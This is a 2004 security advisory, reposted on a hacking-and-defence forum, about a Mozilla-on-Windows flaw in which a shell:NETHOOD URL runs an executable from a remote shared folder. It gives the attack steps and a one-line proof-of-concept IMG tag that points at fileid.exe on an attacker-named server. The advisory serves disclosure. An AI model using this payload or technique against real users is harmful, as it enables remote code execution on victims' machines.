[转载]SHELL can execute remote EXE program(页 1) - 网络攻防技术{ Hacking and Defence } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

冰血封情 2004-7-13 03:19

[转载]SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu <[email]liudieyu@umbrella.name[/email]>
　　　　　　　　　　　　　　　　　　#
[START] Advisory

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"

At last, make MOZILLA request the following URL:

shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A file named "fileid.exe" in the "shared" folder will be executed.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
[url]http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html[/url]
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
[url]http://does-not-exist.org/mail-archives/bugtraq/msg02171.html[/url]
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

liudieyu
[url]http://umbrella.name[/url]

　　　　　　　　　　　　#
[START] PROOF OF CONCEPT
　　　　　　　　　　###


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

[url]http://seclists.org/lists/fulldisclosure/2004/Jul/0425.html[/url]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[转载]SHELL can execute remote EXE program